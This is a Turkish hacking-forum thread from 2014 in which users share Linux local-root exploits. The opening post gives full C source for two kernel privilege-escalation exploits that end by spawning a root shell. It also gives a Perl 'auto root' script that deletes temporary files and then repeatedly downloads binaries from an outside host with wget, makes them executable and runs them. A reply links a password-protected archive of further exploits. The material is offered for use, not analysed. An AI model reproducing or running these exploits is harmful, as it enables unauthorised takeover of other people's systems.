Konuyu Oyla:
  • Toplam: 3 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Local Root Exploitler Bu Konu Altında
cLowN
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 16 / 236
Deneyim: 44 / 100
Rep Sayısı: 9
Mesaj Sayısı: 130
Üyelik Tarihi: 19.08.2013
     
Yorum: #1
Local Root Exploitler Bu Konu Altında
16.02.2014 16:36
Merhaba arkadaşlar, herkez burda elinde olan local root exploitleri paylaşabilir. Herkez yararlansın Smile


Linux 2.6.18 408 / 3.2.6 2012 Local Root Exploit:
Kod:
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>

#include <asm/page.h>

#define MREMAP_MAYMOVE    1
#define MREMAP_FIXED    2

#define str(s)     #s
#define xstr(s) str(s)

#define DSIGNAL        SIGCHLD
#define CLONEFL        (DSIGNAL|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VFORK)
#define PAGEADDR    0x2000

#define RNDINT        512

#define NUMVMA        (3 * 5 * 257)
#define NUMFORK        (17 * 65537)

#define DUPTO        1000
#define TMPLEN        256

#define __NR_sys_mremap    163

_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len, unsigned long
new_len,
             unsigned long flags, unsigned long new_addr);


static volatile int pid = 0, ppid, hpid, *victim, *fops, blah = 0, dummy = 0, uid,
gid;
static volatile int *vma_ro, *vma_rw, *tmp;
static volatile unsigned fake_file[16];


**** fatal(const char * msg)
{
    printf("\n");
    if (!errno) {
        fprintf(stderr, "FATAL: %s\n", msg);
    } else {
        perror(msg);
    }

    printf("\nentering endless loop");
    fflush(stdout);
    fflush(stderr);
    while (1) pause();
}

**** kernel_code(**** * file, loff_t offset, int origin)
{
    int i, c;
    int *v;

    if (!file)
        goto out;

    __asm__("movl    %%esp, %0" : : "m" (c));

    c &= 0xffffe000;
    v = (**** *) c;

    for (i = 0; i < PAGE_SIZE / sizeof(*v) - 1; i++) {
        if (v[i] == uid && v[i+1] == uid) {
            i++; v[i++] = 0; v[i++] = 0; v[i++] = 0;
        }
        if (v[i] == gid) {
            v[i++] = 0; v[i++] = 0; v[i++] = 0; v[i++] = 0;
            break;
        }
    }
out:
    dummy++;
}

**** try_to_exploit(****)
{
    int v = 0;

    v += fops[0];
    v += fake_file[0];

    kernel_code(0, 0, v);
    lseek(DUPTO, 0, SEEK_SET);

    if (geteuid()) {
        printf("\nFAILED uid!=0"); fflush(stdout);
        errno =- ENOSYS;
        fatal("uid change");
    }

    printf("\n[+] PID %d GOT UID 0, enjoy!", getpid()); fflush(stdout);

    kill(ppid, SIGUSR1);
    setresuid(0, 0, 0);
    sleep(1);

    printf("\n\n"); fflush(stdout);

    execl("/bin/bash", "bash", NULL);
    fatal("burp");
}

**** cleanup(int v)
{
    victim[DUPTO] = victim[0];
    kill(0, SIGUSR2);
}


**** redirect_filp(int v)
{
    printf("\n[!] parent check race... "); fflush(stdout);

    if (victim[DUPTO] && victim[0] == victim[DUPTO]) {
        printf("SUCCESS, cought SLAB page!"); fflush(stdout);
        victim[DUPTO] = (unsigned) & fake_file;
        signal(SIGUSR1, &cleanup);
        kill(pid, SIGUSR1);
    } else {
        printf("FAILED!");
    }
    fflush(stdout);
}

int get_slab_objs(****)
{
    FILE * fp;
    int c, d, u = 0, a = 0;
    static char line[TMPLEN], name[TMPLEN];

    fp = fopen("/proc/slabinfo", "r");
    if (!fp)
        fatal("fopen");

    fgets(name, sizeof(name) - 1, fp);
    do {
        c = u = a =- 1;
        if (!fgets(line, sizeof(line) - 1, fp))
            break;
c = sscanf(line, "%s %u %u %u %u %u %u", name, &u, &a, &d, &d, &d, &d);
    } while (strcmp(name, "size-4096"));
  
    fclose(fp);

    return c == 7 ? a - u : -1;
}

**** unprotect(int v)
{
    int n, c = 1;

    *victim = 0;
    printf("\n[+] parent unprotected PTE "); fflush(stdout);

    dup2(0, 2);
    while (1) {
        n = get_slab_objs();
        if (n < 0)
            fatal("read slabinfo");
        if (n > 0) {
            printf("\n    depopulate SLAB #%d", c++);
            blah = 0; kill(hpid, SIGUSR1);
            while (!blah) pause();
        }
        if (!n) {
            blah = 0; kill(hpid, SIGUSR1);
            while (!blah) pause();
            dup2(0, DUPTO);
            break;
        }
    }

    signal(SIGUSR1, &redirect_filp);
    kill(pid, SIGUSR1);
}

**** cleanup_vmas(****)
{
    int i = NUMVMA;

    while (1) {
        tmp = mmap((**** *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ,
                MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
        if (tmp != (**** *) (PAGEADDR - PAGE_SIZE)) {
            printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
            fatal("unmap1");
        }
        i--;
        if (!i)
            break;

    tmp = mmap((**** *) (PAGEADDR - PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE,
                MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (tmp != (**** *) (PAGEADDR - PAGE_SIZE)) {
            printf("\n[-] ERROR unmapping %d", i); fflush(stdout);
            fatal("unmap2");
        }
        i--;
        if (!i)
            break;
    }
}

**** catchme(int v)
{
    blah++;
}

**** exitme(int v)
{
    _exit(0);
}

**** childrip(int v)
{
    waitpid(-1, 0, WNOHANG);
}

**** slab_helper(****)
{
    signal(SIGUSR1, &catchme);
    signal(SIGUSR2, &exitme);
    blah = 0;

    while (1) {
        while (!blah) pause();

        blah = 0;
        if (!fork()) {
            dup2(0, DUPTO);
            kill(getppid(), SIGUSR1);
            while (1) pause();
        } else {
            while (!blah) pause();
            blah = 0; kill(ppid, SIGUSR2);
        }
    }
    exit(0);
}

int main(****)
{
    int i, r, v, cnt;
    time_t start;

    srand(time(NULL) + getpid());
    ppid = getpid();
    uid = getuid();
    gid = getgid();

    hpid = fork();
    if (!hpid)
        slab_helper();

    fops = mmap(0, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
            MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (fops == MAP_FAILED)
        fatal("mmap fops VMA");
    for (i = 0; i < PAGE_SIZE / sizeof(*fops); i++)
        fops[i] = (unsigned)&kernel_code;
    for (i = 0; i < sizeof(fake_file) / sizeof(*fake_file); i++)
        fake_file[i] = (unsigned)fops;

    vma_ro = mmap(0, PAGE_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (vma_ro == MAP_FAILED)
        fatal("mmap1");

    vma_rw = mmap(0, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (vma_rw == MAP_FAILED)
        fatal("mmap2");

    cnt = NUMVMA;
    while (1) {
        r = sys_mremap((ulong)vma_ro, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
        if (r == (-1)) {
            printf("\n[-] ERROR remapping"); fflush(stdout);
            fatal("remap1");
        }
        cnt--;
        if (!cnt) break;

        r = sys_mremap((ulong)vma_rw, 0, 0, MREMAP_FIXED|MREMAP_MAYMOVE, PAGEADDR);
        if (r == (-1)) {
            printf("\n[-] ERROR remapping"); fflush(stdout);
            fatal("remap2");
        }
        cnt--;
        if (!cnt) break;
    }

    victim = mmap((*****)PAGEADDR, PAGE_SIZE, PROT_EXEC|PROT_READ|PROT_WRITE,
            MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
    if (victim != (**** *) PAGEADDR)
        fatal("mmap victim VMA");

    v = *victim;
    *victim = v + 1;

    signal(SIGUSR1, &unprotect);
    signal(SIGUSR2, &catchme);
    signal(SIGCHLD, &childrip);
    printf("\n[+] Please wait...HEAVY SYSTEM LOAD!\n"); fflush(stdout);
    start = time(NULL);

    cnt = NUMFORK;
    v = 0;
    while (1) {
        cnt--;
        v--;
        dummy += *victim;

        if (cnt > 1) {
            __asm__(
            "pusha                \n"
            "movl %1, %%eax            \n"
            "movl $("xstr(CLONEFL)"), %%ebx    \n"
            "movl %%esp, %%ecx        \n"
            "movl $120, %%eax        \n"
            "int  $0x80            \n"
            "movl %%eax, %0            \n"
            "popa                \n"
            : : "m" (pid), "m" (dummy)
            );
        } else {
            pid = fork();
        }

        if (pid) {
            if (v <= 0 && cnt > 0) {
                float eta, tm;
                v = rand() % RNDINT / 2 + RNDINT / 2;
                tm = eta = (float)(time(NULL) - start);
                eta *= (float)NUMFORK;
                eta /= (float)(NUMFORK - cnt);
                printf("\r\t%u of %u [ %u %%  ETA %6.1f s ]          ",
                NUMFORK - cnt, NUMFORK, (100 * (NUMFORK - cnt)) / NUMFORK, eta - tm);
                fflush(stdout);
            }
            if (cnt) {
                waitpid(pid, 0, 0);
                continue;
            }
            if (!cnt) {
                while (1) {
                     r = wait(NULL);
                     if (r == pid) {
                    cleanup_vmas();
                    while (1) { kill(0, SIGUSR2); kill(0, SIGSTOP); pause(); }
                     }
                }
            }
        }

        else {
            cleanup_vmas();

            if (cnt > 0) {
                _exit(0);
            }

        printf("\n[+] rooting done..the moment of truth..."); fflush(stdout);
            sleep(1);

            signal(SIGUSR1, &catchme);
            munmap(0, PAGE_SIZE);
            dup2(0, 2);
            blah = 0; kill(ppid, SIGUSR1);
            while (!blah) pause();

            munmap((**** *)victim, PAGE_SIZE);
            dup2(0, DUPTO);

            blah = 0; kill(ppid, SIGUSR1);
            while (!blah) pause();
            try_to_exploit();
            while (1) pause();
        }
    }
    return 0;
}
2.6.37-3.8.10 Kernel 2013 Root Exploit:
Kod:
#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>

#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {
        int i,j,k;
        uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
        uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
        uint64_t kbase = ((uint64_t)current)>>36;
        uint32_t *fixptr = (void*) AB(1);
        *fixptr = -1;

        for (i=0; i<4000; i+=4) {
                uint64_t *p = (void *)&current[i];
                uint32_t *t = (void*) p[0];
                if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
                for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
                        if (((uint32_t*)uids)[k] != t[j+k]) goto next;
                        for (i = 0; i < 8; i++) t[j+i] = 0;
                        for (i = 0; i < 10; i++) t[j+9+i] = -1;
                        return;
next:;          }
        }
}

void sheep(uint32_t off) {
        uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
        int fd = syscall(298, buf, 0, -1, -1, 0);
        assert(!close(fd));
}


int     main() {
        uint64_t  u,g,needle, kbase, *p; uint8_t *code;
        uint32_t *map, j = 5;
        int i;
        struct {
                uint16_t limit;
                uint64_t addr;
        } __attribute__((packed)) idt;
        assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
        memset(map, 0, SIZE);
        sheep(-1); sheep(-2);
        for (i = 0; i < SIZE/4; i++) if (map[i]) {
                assert(map[i+1]);
                break;
        }
        assert(i<SIZE/4);
        asm ("sidt %0" : "=m" (idt));
        kbase = idt.addr & 0xff000000;
        u = getuid(); g = getgid();
        assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
        memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
        memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
                printf("2.6.37-3.x x86_64\[email protected] 2010\n") % 27);
        setresuid(u,u,u); setresgid(g,g,g);
        while (j--) {
                needle = AB(j+1);
                assert(p = memmem(code, 1024, &needle, 8));
                if (!p) continue;
                *p = j?((g<<32)|u):(idt.addr + 0x48);
        }
        sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
        asm("int $0x4");        assert(!setuid(0));
        return execl("/bin/bash", "-sh", NULL);
}
Linux Auto Root 2011-2012:
Kod:
#!/usr/bin/perl
# B1M0KH
{
system("rm -rf /tmp/*");
system("rm -rf /var/tmp/*");
system("wget http://kabooos.persiangig.com/r00t/audit");
system("chmod 777 audit");
system("./audit");
system("id");
system("./audit");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/1");
system("chmod 777 1");
system("./1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget 1-2 http://kabooos.persiangig.com/r00t/1-2");
system("chmod 777 1-2");
system("./1-2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget 1-3 http://kabooos.persiangig.com/r00t/1-3");
system("chmod 777 1-3");
system("./1-3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/1-4");
system("chmod 777 1-4");
system("./1-4");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://kabooos.persiangig.com/r00t/2");
system("chmod 777 2");
system("./2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget 2-1 http://kabooos.persiangig.com/r00t/2-1");
system("chmod 777 2-1");
system("./2-1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/3");
system("chmod 777 3");
system("./3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/4");
system("chmod 777 4");
system("./4");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/5");
system("chmod 777 5");
system("./5");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/6");
system("chmod 777 6");
system("./6");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/7");
system("chmod 777 7");
system("./7");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/8");
system("chmod 777 8");
system("./8");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/9");
system("chmod 777 9");
system("./9");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/10");
system("chmod 777 10");
system("./10");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/11");
system("chmod 777 11");
system("./11");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/13.py");
system("chmod 777 13.py");
system("python 13.py");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/14");
system("chmod 777 14");
system("./14");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/15.sh");
system("chmod 777 15.sh");
system("./15.sh");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/16");
system("chmod 777 16");
system("./16");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/16-1");
system("chmod 777 16-1");
system("./16-1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/bru1.tar.gz");
system("tar xzf bru1.tar.gz");
sleep(1);
system("chmod 777 run");
system("./run");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/bru2.tar.gz");
system("tar xzf bru2.tar.gz");
sleep(1);
system("chmod 777 run");
system("./run");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/bru3.tar.gz");
system("tar xzf bru3.tar.gz");
sleep(1);
system("chmod 777 run.sh");
system("./run.sh");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/exploit");
system("chmod 777 exploit");
system("./exploit");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/pwnkernel");
system("chmod 777 pwnkernel");
system("chmod 777 pwnkernel");
system("./pwnkernel");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/bru.tar.gz");
system("tar xzf bru.tar.gz");
sleep(1);
system("sed -i '/turn_\(on\|off\)_wp();/d' exploit.c");
system("sh run_null_exploits.sh");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget 44 http://kabooos.persiangig.com/r00t/44");
system("chmod 777 44");
system("./44");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/7x");
system("chmod 777 7x");
system("./7x");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/7-2");
system("chmod 777 7-2");
system("./7-2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/exp1");
system("chmod 777 exp1");
system("./exp1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/exp2");
system("chmod 777 exp2");
system("./exp2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/exp3");
system("chmod 777 exp3");
system("./exp3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/runx");
system("chmod 777 runx");
system("./runx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/root1");
system("chmod 777 root1");
system("./root1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/rot");
system("chmod 777 rot");
system("./rot");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/36-rc1");
system("chmod 777 36-rc1");
system("./36-rc1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/18");
system("chmod 777 18");
system("./18");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/15150");
system("chmod 777 15150");
system("./15150");
system("./15150 0xc0102290 64");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/31");
system("chmod 777 31");
system("./31");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/ubuntu");
system("chmod 777 ubuntu");
system("./ubuntu");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/lenis.sh");
system("chmod 777 lenis.sh");
system("./lenis.sh");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/gayros");
system("chmod 777 gayros");
system("./gayros");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/full-nelson");
system("chmod 777 full-nelson");
system("./full-nelson");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2-6-37");
system("chmod 777 2-6-37");
system("./2-6-37");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/tivoli");
system("chmod 777 tivoli");
system("./tivoli");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/13x");
system("chmod 777 13x");
system("./13x");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/15200");
system("chmod 777 15200");
system("./15200");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/ameri...n-language");
system("chmod 777 american-sign-language");
system("./american-sign-language");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/z1d-2011");
system("chmod 777 z1d-2011");
system("./z1d-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/18-5");
system("chmod 777 18-5");
system("./18-5");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.18-164-2010");
system("chmod 777 2.6.18-164-2010");
system("./2.6.18-164-2010");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.18-194.1-2010");
system("chmod 777 2.6.18-194.1-2010");
system("./2.6.18-194.1-2010");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.18-194.2-2010");
system("chmod 777 2.6.18-194.2-2010");
system("./2.6.18-194.2-2010");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.34-2011Exploit1");
system("chmod 777 2.6.34-2011Exploit1");
system("./2.6.34-2011Exploit1");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.18-194");
system("chmod 777 2.6.18-194");
system("./2.6.18-194");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.18-274-2011");
system("chmod 777 2.6.18-274-2011");
system("./2.6.18-274-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.33-2011");
system("chmod 777 2.6.33-2011");
system("./2.6.33-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.18-6-x86-2011");
system("chmod 777 2.6.18-6-x86-2011");
system("./2.6.18-6-x86-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.28-2011");
system("chmod 777 2.6.28-2011");
system("./2.6.28-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.34-2011Exploit1");
system("chmod 777 2.6.34-2011Exploit1");
system("./2.6.34-2011Exploit1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.34-2011Exploit2");
system("chmod 777 2.6.34-2011Exploit2");
system("./2.6.34-2011Exploit2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/local...oit-gayros");
system("chmod 777 local-root-exploit-gayros");
system("./local-root-exploit-gayros");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/vmspl...ot-exploit");
system("chmod 777 vmsplice-local-root-exploit");
system("./vmsplice-local-root-exploit");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2-6-32-46-2011");
system("chmod 777 2-6-32-46-2011");
system("./2-6-32-46-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
sleep 5;
system("wget http://kabooos.persiangig.com/r00t/2.6.1...1.el5-2012");
system("chmod 777 2.6.18-374.12.1.el5-2012");
system("./2.6.18-374.12.1.el5-2012");
system("id");
print "\n\n--- Shared bY h4x0r HuSsY ---\n\n";
}
(Bu konu en son: 16.02.2014 Tarihinde, Saat: 16:41 düzenlenmiştir. Düzenleyen: cLowN.)
Alinti
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı: 113
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #2
Cvp: Local Root Exploitler Bu Konu Altında
16.02.2014 22:52
Eyvallah


Alinti
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,355 / 1,355
Deneyim: 22 / 100
Rep Sayısı: 2688
Mesaj Sayısı: 6096
Üyelik Tarihi: 21.08.2013
     
Yorum: #3
Cvp: Local Root Exploitler Bu Konu Altında
01.10.2014 13:23
Kod:
Local Root Exploit =>
2006
2007
2008
2009
2010
2011
2.6.18 2012
2.6.32 2012 and 2013 ( bir tanesi çalışıyor )
FreeBSD 7,7.1,8
Autoroot 2011 And 2012
And Also Windows NT User Privilege Escalation
http://www.mediafire.com/download/6047p6fbbldafam/locals+updated-Ch3rn0by1.rar
Şifresi => box3dup
(Bu konu en son: 01.10.2014 Tarihinde, Saat: 13:23 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.

cyberizm

Alinti
Rep Verenler: 02d3



1 Ziyaretçi